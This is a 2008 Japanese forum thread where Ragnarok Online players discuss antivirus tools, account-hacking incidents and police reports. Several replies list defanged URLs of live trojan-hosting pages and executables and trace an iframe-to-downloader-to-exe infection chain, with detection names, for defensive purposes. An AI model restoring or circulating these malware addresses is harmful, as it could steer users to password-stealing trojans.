全部 1- 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 最新50  

セキュリティ対策、質問・雑談スレ5

1 名前:(○口○*)さん :08/03/14 18:48 ID:YP1hbvgt0
※※※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ※※※

アカウントハックが横行する昨今、セキュリティに関して話し合いましょう。
・ウイルスソフトやスパイウェアチェックソフトなどの一般的な質問。
・アカウントハック対策に関しての討論など。
・セキュリティ関係の最新情報、ニュースなど。
・アカハックを踏んでしまった/アカハックと関係のないものを踏んでしまった時の相談
・アカハックに関してはRO板の総合対策スレでも回答しますが、極力こちらをご利用下さい。
・アカハックと関係無いものに関する相談が総合スレに書き込まれた場合、こちらに誘導を。
・危険性があるURLは必ず「.」を「■」に置き換えて貼り付けください。

アカウントハック総合対策スレ9
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/

■スレの性格上、誤って危険なURLがそのまま貼られてしまう可能性がある■
■URLを無闇に踏んで回らないこと。報告・相談はテンプレを利用すること■

現在のテンプレは暫定的なものです。スレの話し合いの結果はROセキュリティWikiへ。

・ROセキュリティWiki
  http://rosafe.rowiki.jp/

※ ID/Pass/サーバ/キャラ名等の情報は公開しないでください
※ ネタや程度を超えた雑談・脱線はご遠慮ください

・スレ立て依頼は>>970がしてください。反応がなければ以降10ごとに。

【過去スレ】
セキュリティ対策、質問・雑談スレ4
http://enif.mmobbs.com/test/read.cgi/livero/1197889519/

2 名前:(○口○*)さん:08/03/14 18:49 ID:YP1hbvgt0
【参考アドレス】
・ROアカウントハック報告スレのまとめサイト
  http://sky.geocities.jp/vs_ro_hack/
・hostsファイル追加分まとめサイト(臨時)
  http://sky.geocities.jp/ro_hp_add/
・安全の為に (BSWikiより)
  http://smith.rowiki.jp/?Security
・リネージュ資料室 (応用可能な情報が多数)
  http://lineage.nyx.bne.jp/
【このスレでよく出てくるアプリケーション】
・PeerGuardian2
  http://sky.geocities.jp/vs_ro_hack/pg2.htm
・WindowsUpdate
  http://www.update.microsoft.com/
【PCにウィルス対策ソフトを導入してない方へ】
・カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
  http://www.kaspersky.co.jp/scanforvirus/
・Kaspersky Anti-Virus (体験版)
  http://www.kaspersky.co.jp/trial/
  http://www.just-kaspersky.jp/products/try/
・NOD32 アンチウイルス (体験版)
  http://www.canon-sol.jp/product/nd/trial.html
・ESET Smart Security(体験版)NOD32+FW機能
  http://canon-sol.jp/product/ess/trial.html
・AVG7.5 free(無料)
 http://free.grisoft.com/doc/download-free-anti-virus/jp/frt/0
・Avast4 HomeEdition(無料)
 http://www.avast.com/jpn/download-avast-home.html
・KINGSOFT InternetSecurty Free(無料)
 http://download.kingsoft.jp/kisfree/

3 名前:(○口○*)さん:08/03/14 18:49 ID:YP1hbvgt0
■PG2用 RO許可リスト■
RAGNAROK-JP:61.215.212.0-61.215.212.255
RAGNAROK-JP2:61.215.214.128-61.215.214.255
WEB-SYSTEM:61.215.220.64-61.215.220.255
RAGNAROK-JP2:211.13.228.0-211.13.228.255
GUNGHO-MODE:211.13.229.0-211.13.229.255
RAGNAROK-JP3:211.13.232.0-211.13.232.255
RAGNAROK-JP4:211.13.235.0-211.13.235.255
GUNGHO-PAT1:219.123.155.160-219.123.155.191
GUNGHO-PAT1:221.247.195.160-221.247.195.191
GUNGHO-PAT3:125.101.19.64-125.101.19.95
GUNGHO-PAT4:124.32.117.192-124.32.117.22

■セキュスレ2-969によるhosts更新支援スクリプト■

あこすれてんぷら避難所を間借りする事で公開しました。
ttp://acopri.s250.xrea.com/index.php?hostsRenewScript

一応説明を付けていますが、自己責任、という事でお願いします。
cfgとvbsの2ファイル構成で、動作に必要なwget等は付属してません。

※ 配布ページとファイルをよく読んで、【自己責任にて】 ご利用ください

4 名前:(○口○*)さん:08/03/14 18:51 ID:YP1hbvgt0
【質問・相談の際の注意】
・誤クリックによる感染を防ぐ為、危険なアドレスは必ず .(ドット)を別の文字に
 置き換えて報告して下さい (■がよく使われています)
・質問前後にテンプレやまとめサイト等を見て知識を深めると更にGoodです
・回答者はエスパーでは有りません。情報は出来るだけ多く。提供した情報の量と質に
 応じて助言の量と質は向上します
・結局は本人にしかどうにも出来ない事を忘れてはいけません
・基本的な対処方法は、総合対策スレの>>5をお読みください。
 http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/5

----------相談用テンプレ----------

【      気付いた日時          】 (感染?に気付いた日時)
【不審なアドレスのクリックの有無 】 (blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス)
【  アドレス   】www■xxx■yyy/index.htm(ドメインのドット(.)を■等で置き換える事。h抜き等は駄目)
【     OS    】WindowsXP Home SP2 (SP等まで正確に書く)
【使用ブラウザ 】IE6.0 sp2 (バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【 アンチウイルスソフト 】 (NortonInternetSecurity2007 等)
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンで Trojan-PSW.Win32.〜 発見 等)
【テンプレの参考サイトを読んだか】 (Yes/No/今から読みます)
【hosts変更】(有/無 [有りの場合は最終更新は何時ごろか])
【PeerGuardian2導入】(有/無 [有りの場合は参照元サイトはどこか)
【説明】
(『怪しいアドレス』との判断した理由、症状を詳しく書く)

5 名前:(○口○*)さん:08/03/14 18:51 ID:YP1hbvgt0
【安全対策の簡易まとめ】
以下は要点となります。詳しくは関連サイトを見てください。

 ・アドレスをホイホイ踏まない。よく確認する。
 ・出所の怪しいプログラムやスクリプトを実行しない。
 ・定期的なMicrosoftUpdate及び、各種ソフト(各種Player、Reader等)のアップデートを行う
 ・アンチウイルスソフトの導入とウイルス定義ファイルの積極的な更新を行う
 ・パーソナルファイアウォールソフト等を導入する
   ・hostsの利用した危険ドメインのブロック
   ・PeerGuardian2を使った危険IPのブロック など
 ・IEコンポーネント未使用のブラウザに乗り換える(Firefox、Opera等)
 ・IEを使う場合は下記を設定
  ・信頼できるSite以外ではスクリプトやActiveXを切る
   :インターネットオプションのセキュリティの部分で設定可能
  ・偽装jpg対策(IE7とIE6SP2限定。IE6SP1以前では出来ない)
   :インターネットオプション→セキュリティ→レベルのカスタマイズ
    →「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする

6 名前:(○口○*)さん:08/03/14 18:53 ID:YP1hbvgt0
■なにか踏んだ時に取るべき対処■
0.解決するまで、ログインやパスワード変更を行なわない。踏んだ後にパスワード入力などを行なってしまった場合
  安全な環境(テンプレぽいものや、Ragnarok板側のテンプレ、Wikiを参照)からパスワード変更。

1.除去し、クリーンな環境に戻す
1−1.発見された場合。
それを削除して完了

1−2.発見されなかった場合
1−2−1.リスクを覚悟でそのまま使う(非推奨)
       リスクを減らす為に、NOD32、カスペなど複数のソフト(試用版が入手できる筈)でスキャンを繰り返し
       安全である可能性が高いことを確認すること。
       ただし複数のソフトを同時にインストールすると干渉してOSが不安定になる事があるので注意。
1−2−2.再インストール
メーカー製の場合、データのバックアップをとって、リカバリーをかける。
自作やショップブランドの場合、データのバックアップをとって、OSを入れなおす。

1−3.安全な環境にする
1−3−1.WindowsUpdateをかける
1−3−2.ウィルス対策ソフト・FW・PG2を導入し、設定する。
         (可能なら、スパイウェア対策のソフトも導入し、定期的にスキャンする)
1−3−3.セキュリティソフトの定義ファイルを最新にする。(当然定期的に自動更新する設定に)

1−4.環境を戻す
     バックアップした「データ」を戻す。各種ソフトを再インストール。
     その後、ウィルススキャンを再度実行。
     ウィルスはバックアップしたデータ内に潜んでいる可能性があります。

1−5.ガンホーIDを削除す…ではなくて、ようやくROをプレイできる環境になりました、おめでとう。

7 名前:(○口○*)さん:08/03/14 18:54 ID:YP1hbvgt0
【このリンクは危険?と思ったときに】
変なリンクを見つけた場合、次の方法でチェックしましょう。

1.まとめサイトやリネージュ資料室のhostsや危険ドメイン一覧で確認
 過去に見つかった罠サイトは、これらのサイトに載っています。
 まずはここに載っていないかを確認しましょう。

2.ソースチェッカーオンラインを使って調べる
 多少の知識が必要ですが、ソースチェッカーを使うことでリンク先を調べる事が出来ます。
 ソース内に怪しいコード・スクリプトが無いか調べましょう。
 ※安全か危険かの判断は自分で行う必要があります。
  また画像ファイルをチェックする場合、罠画像ファイルだと発動する恐れもあるので
  注意してください。

3.スレで質問する
 1.2の方法でも判断出来ない場合、スレで聞いてみるのも手です。
 ただし、このスレは『勇気が無くて見れないサイト解説スレ』ではありません。
 その点だけは注意してください。

質問・報告する場合は「.」を「■」に置き換えるのを忘れないようにしてください。

8 名前:(○口○*)さん:08/03/15 18:54 ID:nbGUYR5e0
mixiの足跡踏んで日記リンク見たらよくわからんサイトだったんだけど垢ハックの可能性あるのかな
ttp://kenko-y■blogspot■com/2008/03/i-can-not-understand■html
よくわからないんだけど誰か教えてください
URLチェックしてみたけど安全性87%とか残りの13%は危険ってことですかって感じでパニくってるんですが・・・

9 名前:(○口○*)さん:08/03/15 19:17 ID:kam+vWBa0
アカウントハックとは関係なさげ。

10 名前:(○口○*)さん:08/03/16 18:51 ID:eChWfIdA0
警察行って状況を話したんだけど
何かあったら連絡しますって言われた後は待ち続けたほうがいいの?
目安とかない?

11 名前:(○口○*)さん:08/03/16 18:59 ID:eChWfIdA0
警察に出向いて調査してもらったけど
復旧まで漕ぎ着けられなかったって方いる?

12 名前:(○口○*)さん:08/03/16 19:11 ID:rtI/4ljr0
週一くらいで連絡したら?
何かあったら連絡します→何もなければ連絡しません

13 名前:(○口○*)さん:08/03/17 02:45 ID:TyORplqk0
このスレから質問スレに神聖が出張してきているんだが、
お持ち帰り願えないでしょうか?

14 名前:(○口○*)さん:08/03/17 02:50 ID:b5WuP64p0
そうやって逆に出張してくるのも神聖に見えると理解するべき

15 名前:(○口○*)さん:08/03/17 02:53 ID:EHmW8B2d0
神聖スレでも手に負えないとかどんだけ

16 名前:(○口○*)さん:08/03/17 03:08 ID:hTT9PMQP0
>>10
仕事の都合上時々警察署の人とやりとりしてた頃の経験で言うと、忙しいとかで連絡忘れたりとか、
明日書類持って行きます→事件はいっちゃってまた後日〜→忘却、がたまにある。署によるけど。

受け付けてくれたのが交番ならすぐに話を始められるし、
警察署だったら電話受付の人がいるから、そのまま「内線○○番の○○さん」で呼び出し、
本人不在でも「○月○日、○課の○○さんに対応していただいた件で、
状況教えていただきたいんですが」とかいえば、
時間があるなら詳細を聞いてさがしてくれたり、担当者から折り返し連絡がもらえた。

17 名前:(○口○*)さん:08/03/17 03:41 ID:gCtHnp8A0
物質スレのこれだな。
無関係のスレに迷惑かけんなよ。

812 :(○口○*)さん :08/03/16 17:53 ID:iZFBhaH30
セキュスレ住人って気違い多いよな


813 :(○口○*)さん :08/03/16 17:57 ID:MB28daxc0
>>812
それは質問なのか?

820 :(○口○*)さん :08/03/16 18:45 ID:UVAwLPnx0
セキュスレ住人は誘導したがり多いからな

18 名前:(○口○*)さん:08/03/17 17:12 ID:W05W7Vww0
カスペ7.0MP1再公開
ttp://www.just-kaspersky.jp/support/v7mp1/

19 名前:(○口○*)さん:08/03/17 17:30 ID:Z1WDm9/+0
今回はすぐに入れずに様子見する

20 名前:(○口○*)さん:08/03/17 19:22 ID:inC807Nh0
おなじく

21 名前:(○口○*)さん:08/03/17 21:01 ID:/fRRggOV0
前回のMP1でトラブルが一切出てないからそのまま使い続けてる俺はどうしたもんだか。
入れ直しした方がいいかねぇ?

22 名前:(○口○*)さん:08/03/17 23:38 ID:qTiXeqCu0
【      気付いた日時          】08/03/16 23:00
【不審なアドレスのクリックの有無 】 mixiからコピペしようとして踏む
【  アドレス   】http://mx■ynjsj■com/ragnarokonline/p-t-00404-v03687/v0368700000000437727■wmv■zip
        及びhttp://mx■ynjsj■com
【     OS    】XP home SP2
【使用ブラウザ 】 firefox 2.0.0.12
【WindowsUpdateの有無】 先月位だったはず
【 アンチウイルスソフト 】ウイルスバスターcorp for windows server2003
【その他のSecurty対策 】 Spybot S&D
【 ウイルススキャン結果】 手動でrundll132.exeとrodll.dllを検索するも見つからず。
             その後spybotを使用。
【テンプレの参考サイトを読んだか】 パっと一通り読みました。詳しく読み直します。
【hosts変更】無
【PeerGuardian2導入】無

zip直リンクのほうは危険度が低いと思いますが、URLをチェッカーにかけようと思って
誤ってhttp://mx■ynjsj■comを踏んでしまいました。
ページ内に何があるか私には解析できないのでどなたかアドバイスをお願いします。
できる限りOS入れなおさない方向でと考えています。

23 名前:(○口○*)さん:08/03/18 00:04 ID:CUu+kq550
>>22
http://mx■ynjsj■com/ は、現時点ではデータがない模様。(踏んだ時点は知らない)

VirusTotalにかけた結果は下記の通り。
zipを解凍して、wmvに見えるexeを実行した時点で発動させることになる模様。

v0368700000000437727■wmv■zip
HIDDENEXT/Worm.Gen(AntiVir)
Trojan.Inject.796(DrWeb)
Suspicious File(eSafe)
W32/Inject.AE!tr(Fortinet)

v0368700000000437727■wmv■exe
Trojan.Inject.796(DrWeb)
Suspicious File(eSafe)
W32/Inject.AE!tr(Fortinet)

発動させてるかどうかの保証はできないので、自己責任でそのまま使うか、OS入れ直しか判断するように。
検知可能な、Dr.Webのオンラインスキャン…は、ファイル単体なので、同じエンジンを使っているウィルスチェイサーの
とこでも利用しとけば比較的安心かも?

http://www.drweb-online.com/en/virustest.html
http://www.viruschaser.jp/support_online.html

24 名前:(○口○*)さん:08/03/18 00:14 ID:+oeu1lDT0
>>23
ありがとうございます。

zipは解凍していないので発動はしていないかと思われます。
ウイルスチェイサーを利用してみます。

25 名前:(○口○*)さん:08/03/18 04:17 ID:Jigb/BGw0
【      気付いた日時          】08/03/16 01:00
【不審なアドレスのクリックの有無 】 クリックして踏む
【  アドレス   】www■skywebsv■com/Blog/
【     OS    】XP Pro SP2
【使用ブラウザ 】 firefox 2.0.0.12
【WindowsUpdateの有無】 2週間前ほど
【 アンチウイルスソフト 】avast!
【その他のSecurty対策 】 ADaware
【 ウイルススキャン結果】 Avast検出なし。カスペオンラインでも実行したが検出なし。
DrWebのオンラインスキャンでもスキャン。検出なし。罠iframe先にあるexe(www■skywebsv■com/Blog/k1■exe)をDLしてきてスキャンしたら検出する。
【テンプレの参考サイトを読んだか】 できる限りの処置はないかと読みました。
【hosts変更】無
【PeerGuardian2導入】無

トロイがレジストリ改竄しそうな場所を確認したが素人目で問題なさげ。
踏んですぐURLで検索すると「リネージュ資料室」が見つかったので熟読。
PeerGuardian2導入して動向を観察する。
リネージュ資料室のブロックリストを追加してみると、
起動時とそれ以降不定期で「Korea 211.234.242.174 : 80 TCP」を頻繁にブロックしてた。
www■egloos■comっていう韓国のブログサービスぽいんだけど・・・
このサイトを踏んだために起きている挙動かは不明、、、

PeerGuardian2を利用して211.234.242.174を頻繁にブロックしてるのは俺だけなんだろうか・・・

26 名前:(○口○*)さん:08/03/18 10:33 ID:CUu+kq550
>>25
2週間ほど前だと、中身が変わってる可能性高いので、参考にならないかも。現在exeは3/14のものになってますし。
不安が残るならOS再インストールコース。これ必須。そんな訳で検体提出行ってきます。

PG2に関しては設定しているリストや、常駐アプリ次第だったりもするのでパス。

ttp://www■skywebsv■com/Blog/
ttp://www■skywebsv■com/Blog/index1■htm
ttp://www■bluewoon■com/Blog/k1■exe

index.htm
  HTML/Infected.WebPage.Gen(AntiVir)
  HTML.Iframe-12(ClamAV)
  HTML.Infected.WebPage(Ikarus)
  Script.Infected.WebPage.Gen(Webwasher-Gateway)

index1.htm
  JS/Dldr.Noopt.1969(AntiVir)
  VBS/Psyme.FF(Authentium)
  JS/Downloader.Agent(AVG)
  JS/Dldr.Noopt.1969(CAT-QuickHeal)
  Downloader.AniLoad.nae(Ewido)
  VBS/Psyme.FF(F-Prot)
  VBS/Agent.EB!tr.dldr(Fortinet)
  Mal/Psyme-A(Sophos)
  Script.Dldr.Noopt.1969(Webwasher-Gateway)

27 名前:(○口○*)さん:08/03/18 10:33 ID:CUu+kq550
k1.exe
  Win-Trojan/Inject.42496.J(AhnLab-V3)
  TR/Inject.aex(AntiVir)
  Generic10.BAU(AVG)
  Trojan.Inject.796(DrWeb)
  Suspicious File(eSafe)
  Trojan.Win32.Inject.aex(F-Secure)
  W32/Inject.AE!tr(Fortinet)
  Virus.Trojan.Win32.Inject.aex(Ikarus)
  Trojan.Win32.Inject.aex(Kaspersky)
  PWS:Win32/Magania.F(Microsoft)
  Win32/PSW.Gamania.NAC(NOD32v2)
  W32/Inject.AWL(Norman)
  Mal/Generic-A(Sophos)
  Trojan.Inject.aex(Webwasher-Gateway)

28 名前:(○口○*)さん:08/03/18 11:08 ID:RMPkaVXF0
>>10 警察で話ししただけじゃないよね?ちゃんと届けだした?
ガンホーの方にも報告ねーアカウントハックの体験とか読んでチェックすべし

>>11 警察までいっても 登録情報が虚偽であったり
パスワードなどを他人に教えてたり(アカウント共有)した場合最悪
パスをもらした人が罪にとわれる場合もあるよ
あと共有してた友達が逮捕とかねー

あとは警察に届けた!けどだめだった!という報告自体が嘘で
借りパク詐欺ってのは最近ありそう 合言葉は「だってガンホーだし」

29 名前:(○口○*)さん:08/03/18 12:38 ID:Jigb/BGw0
>>26
わざわざありがとう。2週間前なのはWindowsUpdateで、
踏んだのは2日前ですので同じexeだと思います。
そしてアドバイス?どおり常駐切っていったら211.234.242.174ブロックは
なくなりました。(グーグルデスクトップが原因だったぽい。)

クリックしてからexeダウンロードまで鯖が重いのか時間がかかるみたいなので
たぶん踏んだけど踏んでないような感じと判断することにしました。
(インラインフレームだからFireFoxだと無害かもですし。)

質問なんですが、もしexeに感染(起動)した場合、
ウイルスソフトは検出ってできるんでしょうか?
アカハックのウイルスexe(今回はk1.exe)自体はスキャンできても、
感染後の修復の為に検索した際、「感染してますよ」レベルでいいから
感知されるのかどうか・・・

って質問しすぎですな。
時間できたときバーチャルPCで自分で踏んで確かめてきますw

30 名前:(○口○*)さん:08/03/18 14:00 ID:ttRLA9BE0
>>27 見ればわかるだろ?
そこに出ていない物(ノートンとか)は(投稿時点では)検知しない。
まともなアンチウイスルベンダなら送られてきたk1.exeに対してのみ
パターンを作成するのではなく、k1.exeを実際に踏んで
レジストリやファイルがどう変わったかを調べた上でパターンを作成する。

31 名前:(○口○*)さん:08/03/18 14:56 ID:CUu+kq550
あ、そうか。踏んだ時点が3/16なら同じexeの「可能性」がありますね。

踏んだ場合の検知
・そのファイルを書き込もうとした時点
・そのファイルを起動するためにメモリに読み込んだ時点
・発動して、レジストリなどになんらかの書き込みが発生した時点

セキュリティソフトを常駐させてれば上記のタイミング等で検知できる可能性がある。

レジストリなどに書き込まれている場合、exeが存在するだけの場合などは、その領域を
セキュリティソフトでスキャンした時点で発見される。

OS起動時にセキュリティソフトより前に起動し、セキュリティソフトの起動を阻害する形のものの場合
検知できないケースもあり得る。

32 名前:(○口○*)さん:08/03/18 18:45 ID:CUu+kq550
セキュWikiの検体提出先修正

3/14〜3/18に送信したものが全て宛先なしで戻ってきた
Prevx(Prevx1) <virus@prevxresearch.com>

PrevxのHPからサンプルの送付先はどこかと質問した所、戻ってきた返答
VirusTotalに投げればOKとのこと。

|Hi,
|Please upload it at www.virustotal.com.
|Regards,
|Prevx Support

33 名前:(○口○*)さん:08/03/19 00:51 ID:aoPWyb1W0
niftyもtypo狙いの偽ドメインだけでなく、本体に被害が出始めた。

[セキュリティ]ニフティ、韓流コンテンツなどで改ざん被害、ウイルス感染の危険を警告(BCN) - Yahoo!ニュース
ttp://headlines.yahoo.co.jp/hl?a=20080318-00000022-bcn-sci

> ニフティ(和田一也社長)は、同社が運営するWebサイト「@nifty」のコンテンツの一部が不正に改ざんされ、閲覧しただけで
>ウイルス感染の危険があったと発表した。当該のコンテンツは「@nifty韓流」と「太王四神記公式ホームページ」の2つ。

34 名前:(○口○*)さん:08/03/19 07:06 ID:rpfTY6jI0
>>32
やる気無いなぁw

F-Protの送信フォームも前から死んでるねぇ
ttp://www.f-prot.com/virusinfo/submission_form.html

35 名前:(○口○*)さん:08/03/19 07:31 ID:JmBR6Dmt0
既出の質問かもしれません。だとしたら申し訳ありません。

→友人が昨日25時にアカハックURLクリック。
→友人,今朝6時半。アカハック踏んだ自宅PCでROにログイン。そのまま出社。
→私,7時。急いでその友人からログインIDとパスとキャラパス教えてもらい,計2キャラのキャラパス変更,空きスロ3に新規キャラ作成ならびキャラパス設定。
→私,7時。幸いな事に装備,倉庫は無事でした。←今ココ

そこですみません。二点ご質問が…。
この今の状態なら,IDとパスを使ってアクセスできても,キャラ選択画面から先に進む事は不可能でしょうか?

友人にこの後のすべき事を伝えたいのですが,今後は
ログインIDとパスワードの変更と,
>>6にあります1−2−2.以後に書かれてある作業を行えばよいのでしょうか。

これで合ってるのか不安で皆さんにお聞きしましたorz。

36 名前:(○口○*)さん:08/03/19 07:44 ID:JmBR6Dmt0
すみませんでした。
総合スレのほうを一から見ていて自己解決しました。
先走ってしまってすみませんでした…。

37 名前:(○口○*)さん:08/03/19 08:18 ID:rpfTY6jI0
Safari3.1正式版来てた。
ttp://www.apple.com/jp/news/2008/mar/18safari.html
ttp://www.apple.com/jp/safari/download/

Bonjourはよくわからんけど(UPnPみたいなもん?)外しておきましょう。

Firefox3より先に出るとは思わなかった。

38 名前:(○口○*)さん:08/03/19 08:56 ID:rpfTY6jI0
VistaSP1正式版
ttp://support.microsoft.com/kb/936330/
x86 ttp://www.microsoft.com/downloads/details.aspx?FamilyID=b0c7136d-5ebb-413b-89c9-cb3d06d12674&DisplayLang=ja
x64 ttp://www.microsoft.com/downloads/details.aspx?FamilyID=874a414b-32b2-41cc-bd8b-d71eda5ec07c&DisplayLang=ja

39 名前:(○口○*)さん:08/03/19 09:59 ID:BlT9+Fm30
>>34
ああ、そっちは、問い合わせたら、今回はメールで送ってくれって返事来た。
その次はフォーム復活してたのでフォームで送ったが、また死んでるので、今はメールでも送ってる。

F-PROT Antivirus Technical Support <support@f-prot.com>

そういや、こっちも書き換えといた方がいいかもなー。

40 名前:(○口○*)さん:08/03/19 12:01 ID:rpfTY6jI0
かなり前から、というかフォームが動いてるのを見たことがない。
post先のメールボックスがすんげー小さくて、満杯になったら
無効化される素敵フォームなんじゃないかと思ってる。

41 名前:(○口○*)さん:08/03/19 12:42 ID:aoPWyb1W0
やる気の無いベンダーは、見捨てた方が会社にもユーザーの為にもいいんじゃないの。
選択されることが無くなれば、自然に淘汰される。

42 名前:(○口○*)さん:08/03/19 12:57 ID:rpfTY6jI0
まー日本でF-Prot使う人はあまり(VBA32やVirusBuster並に)いないと思うので
その辺は趣味で。

43 名前:(○口○*)さん:08/03/19 19:12 ID:ClDTQZk90
>>10
遅くなりましたが、前スレに体験をかいてきてますので、よろしければ。
http://enif.mmobbs.com/test/read.cgi/livero/1197889519/629,670,671,740,755,774,983

昨日最寄署に出向いてまいりました。
ガンホーから取り寄せた資料、中身は文字も小さく見えませんでしたが
私が最終正常ログインした時間〜異常に気付いた時間までの
私のキャラの行動データをExcelに落としたもののようで、担当警官が読んでくれました。

まず、他者によって3回のログインがされていたこと。
1回目はINのみでOUTログがない(これはマクロ等の都合かもしれませんが理由不明)
2回目は5分前後、3回目は10分前後のIN-OUTとなっていました。

2回目のIN時はキャラの持っていたアイテム、所持金、カーと中身を全て別キャラに取引窓で渡し。
サブキャラにも全てそれを行ったあと、3回目のINをして
倉庫のアイテムを一部のゴミカード等以外全て取り出し、取引窓で取引していました。
露店に出してもすぐ高値で売れなさそうなものは全てNPCに売っていました。
作業スピードからいってマクロだろう、常習犯ではないかという話しになりました。

次にハックされた方法ですが、1月の連休時に連れが遊びにきてデスクトップ機を使っており、
その際踏んだと思われる日時でのトロイがハッキング発覚後のウイルスチェックで発見されたこと。
そのPCで使っていなかった別アカは無事だったことなど、詳しい状況を説明。

また、ゲームの経験が無い担当者ということで、ログインの手順や取引システムなどを説明し、
NPCとはなにか、どう使うのか、RMTとは何かを説明。
目的はとったZenyと、アイテムもおそらくZenyに変えてRMTで現金を得るのではないかと話しました。
非常に興味を持って納得してくれた様子で、またこの不正アクセスを行ったIP・ホストと
受け渡したキャラのIP・ホスト情報から捜査を進めてくれるとのことでした。

ちなみに、以前にもFF等で似た案件があったそうですが、
アイテムが帰ってくると「ありがとう、はいさようなら」なユーザーが多いそうです。
国際犯罪であり、組織的な可能性もあって裏に大きな犯罪組織があることもあるため、
その後も捜査協力して欲しいのだが…と愚痴っぽく話しておられましたので、
IT関係者でもあり日本円の海外流出問題は認識している。
なにかあれば、私のアイテムが戻ったあとも協力しますと伝えました。

44 名前:(○口○*)さん:08/03/19 19:18 ID:ClDTQZk90
お話をしたのはだいたい一時間くらいでした。
真面目な捜査官でユーモアもあり、話しやすくて助かりました。
ガンホーとのやり取りの時系列と、警察とのやり取りの時系列を詳しく知りたがっていたので、
印刷環境のある人はガンホーとのやり取りを印刷してお渡ししたほうがいいと思います。
(無理なら、署のPCで印刷させていただくと良いです)
あとは、こちらも出来る限り情報提供の協力をするという姿勢が大事だと思います。
一緒にハックされた相方のことも調書に必要ということなので、
週末に会った時私から担当者に連絡を入れて電話をかわり、話してもらう予定です。

45 名前:(○口○*)さん:08/03/19 20:04 ID:wW2w8BMM0
乙です。これはありがたい報告。

46 名前:(○口○*)さん:08/03/19 21:03 ID:BlT9+Fm30
一般的話題なので総合スレから移動

|518 (^ー^*)ノ〜さん sage 08/03/19 18:22 ID:em6QsCyE0
|垢ハック・又は罠を踏んでから、OSの再インストールをせずにカスペル等で
|駆除した後被害にあった報告って今までにありました?

|519 (^ー^*)ノ〜さん sage New! 08/03/19 20:17 ID:pkeYl+BT0
>>518
|ありました。再インストがんば

駆除した際に、複数のトロイ等が入れられており、すり抜けたものが残ることがあり得る。
その場合、すり抜けたものによって、(一部)駆除したのに(残ったものによって)アカハックを食らうという
事例が発生する。

実際にそうなったという具体的な報告があったかどうかは記憶にないが、確認することもないだろう。

駆除できても、何かが残っている可能性があり、完全に安全な環境に戻ったという保証はできないので
踏んでしまったらOS再インストールコースというのが、セキュスレ・総合対策スレ共通の対処の指針だと思う。

検体確認し、検出名を報告してくれているのを見てすり抜けて残っているものが存在する可能性の程度を
自分で判断できる人が自己責任でどうこうするのは自由ですけどね。

>>43-44
報告乙です。

こういった後にしっかり残しておきたい報告こそ、ログの残るRO板の総合スレに投下して欲しいと思うがどうだろう。

47 名前:(○口○*)さん:08/03/19 21:19 ID:E8ieV4IQ0
個人的には同意だな。
相談でも雑談でもないし、一般的なセキュリティというより明らかにアカハックに関係した
いわゆる重要な情報と言ってもいいくらいの報告だし。

48 名前:(○口○*)さん:08/03/19 22:48 ID:Egb5nOns0
>>43-44
おつです
先日警察署に出向いたので参考にさせていただきます

しっかしうちの警察署は無関心すぎて何度も同じこと言わなくちゃいけなくてつらい(´;ω;`)

49 名前:(○口○*)さん:08/03/19 23:37 ID:mIEj4R/t0
RMCの取引板で踏んでしまったのですが、これはアカハックアドレスなのでしょうか
ttp://momohac■blog34■fc2■com/blog-entry-1■html
すぐにRO落としてウィルスチェックしているのですが不安で…

50 名前:(○口○*)さん:08/03/19 23:41 ID:xFzMmqdf0
※※※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ※※※

でも垢ハック含まれてる

51 名前:(○口○*)さん:08/03/19 23:51 ID:mIEj4R/t0
>>50
申し訳ないです
ウィルスチェック終わったら駆除してOS再インストールやってみます。ありがとうございました

52 名前:(○口○*)さん:08/03/19 23:55 ID:BlT9+Fm30
>>50
このツンデレめwww

ttp://momohac■blog34■fc2■com/blog-entry-1■html
ttp://www■shagigi■net/navi/
ttp://www■shagigi■net/navi/index1■htm
ttp://www■shagigi■net/navi/admin■exe

こんな順序で呼び出し

->blog-entry-1.html
-->index.htm
--->index1.htm
---->admin.exe

admin.exeは2種類のトロイが入った自己解凍型。2008/03/07製、検体提出済の奴だな。

index.htm : HTML/Infected.WebPage.Gen(AntiVir)
index1.htm : Trojan-Downloader.VBS.Agent.jq
admin.exe/f.exe : Trojan-PSW.Win32.OnLineGames.tge
admin.exe/l1.exe : Trojan.Win32.Inject.aci

53 名前:(○口○*)さん:08/03/19 23:57 ID:wOG7S1rv0
こんなところに報告するよりURL偽装のハッキングは立派な
ネット犯罪なんだから通報が先だってばwwwwwwwwwwwww

54 名前:(○口○*)さん:08/03/20 00:01 ID:wytvkezw0
>>51
OS再インストールやるなら、駆除する意味が・・・まぁ、いいか。

「バックアップ→OSインストール→WindowqsUpdate→セキュリティソフトの導入と定義更新→各種アプリ導入等」

55 名前:(○口○*)さん:08/03/21 10:58 ID:NL0iOyoW0
はじめまして、失礼します。
ここ数日、自分のmixiに、ROっぽいけど意味不明な文言とともにzipファイルへのアドレスが
入ったコメントが書き込まれています。まとめサイトの危険サイトアドレスに該当しそうな
アドレスはなく、ソースチェッカーオンラインでもわからず対応に困っています。

危険なファイルであればmixiの事務局へ通報しようかと思っているのですが、こういう場合は
どうやってファイルの安全性を調べればよいのでしょうか?
すみませんがよろしくお願いいたします。

56 名前:(○口○*)さん:08/03/21 11:33 ID:eYMob/gs0
>55
自分が調べる場合は
・ソースチェッカーでそのアドレスがZIP直かどうかのチェック
・安全な環境(出来れば非Windows環境)で該当ファイルをDL
・それをVirusTotalに投げて結果を見る
ってやってる。

Win環境でやる場合はブラウザからDLではなく、wget等で誤操作が起き難いように
注意してDL。

既知のウィルスで、アンチウィルスソフトのリアルタイム検索が走ってるなら
その時点で反応する場合もある。
でも反応がないからといって無害とは限らないので注意。
罷り間違ってもファイルを開くなどの操作はしないように。

調査するつもりが発動させてしまったなんて事故は割と良く起きるので、細心の
注意を払ってやる事。


注意してたのについうっかり実行してしまった、なんてお馬鹿な真似をやらかして
顔面蒼白というか涙目になるのは、自分だけでいい orz

57 名前:(○口○*)さん:08/03/21 11:54 ID:3p61E8Wm0
>>55
